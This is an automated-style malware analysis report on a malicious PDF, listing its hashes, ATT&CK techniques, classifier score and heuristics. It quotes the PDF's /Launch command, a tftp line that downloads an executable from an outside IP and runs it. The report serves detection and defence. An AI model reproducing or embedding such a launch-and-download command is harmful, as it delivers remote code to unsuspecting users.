Malicious PDF — malware analysis report

Static analysis result for SHA-256 b2d7811a4c64b413…

Verdict: MALICIOUS
File type: PDF
Size: 1.3 KB
MD5: f24f61a75eb6ac31709428c2c3c39d87
SHA-1: bb11efdbbc5e45a4842d7a6e7f35db7aba3d083e
SHA-256: b2d7811a4c64b4133c2a2a4e9bfc92e5acab77fef4cff3c4a8c8f399571bf792
Risk Score: 150

Malware Insights

MITRE ATT&CK

  • T1204.002 Malicious File
  • T1059.003 Windows Command Shell
  • T1105 Ingress Tool Transfer

The PDF contains a /Launch action that executes 'cmd.exe'. The command line argument supplied is 'tftp -i 172.16.122.138 GET /tmp/titan/calc.exe&&calc.exe', which attempts to download a file named 'calc.exe' from the IP address 172.16.122.138 via TFTP and then execute it. This is a downloader pattern: the document itself carries no payload and instead retrieves and runs a second-stage executable when the reader honours the launch action.

Machine Learning

  • Nyx PDF Classifier: malicious score 0.9996

Heuristics (2)

  • Launch action (critical, PDF_LAUNCH)
    PDF contains a /Launch action whose target is an executable, URL, or UNC path; such an action can start an external application.
  • /Launch action target: cmd.exe (critical, PDF_LAUNCH_COMMAND)
    PDF /Launch action specifies an executable target and references a known-dangerous executable (cmd, PowerShell, etc.).